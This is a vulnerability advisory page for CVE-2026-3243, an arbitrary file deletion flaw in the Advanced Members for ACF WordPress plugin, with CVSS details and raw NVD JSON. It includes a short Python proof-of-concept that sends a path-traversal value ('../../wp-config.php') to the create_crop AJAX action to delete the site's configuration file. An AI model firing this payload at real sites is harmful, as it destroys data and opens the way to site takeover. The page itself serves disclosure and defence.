Security Vulnerability Report
中文
CVE-2026-3243 CVSS 8.8 HIGH

CVE-2026-3243

Published: 2026-04-08 12:16:22
Last Modified: 2026-04-24 18:05:09

Description

The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 1.2.5.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Advanced Members for ACF <= 1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit scenario for CVE-2026-3243 # Target: WordPress with Advanced Members for ACF <= 1.2.5 # Description: Deletes wp-config.php to trigger reinstallation/RCE target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker's cookie (Subscriber level) cookies = { "wordpress_logged_in_xxx": "attacker_session_cookie" } # Payload data exploiting the path traversal payload_data = { "action": "create_crop", "file_path": "../../wp-config.php" # Path traversal payload } try: response = requests.post(target_url, data=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Exploit request sent successfully.") print("[+] Check if wp-config.php is deleted.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3243", "sourceIdentifier": "[email protected]", "published": "2026-04-08T12:16:21.610", "lastModified": "2026-04-24T18:05:09.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 1.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L266", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L57", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/advanced-members/trunk/core/modules/class-avatar.php#L710", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3479725/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3492372/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/22b63369-c6ea-42e9-bea3-d15837da7732?source=cve", "source": "[email protected]"}]}}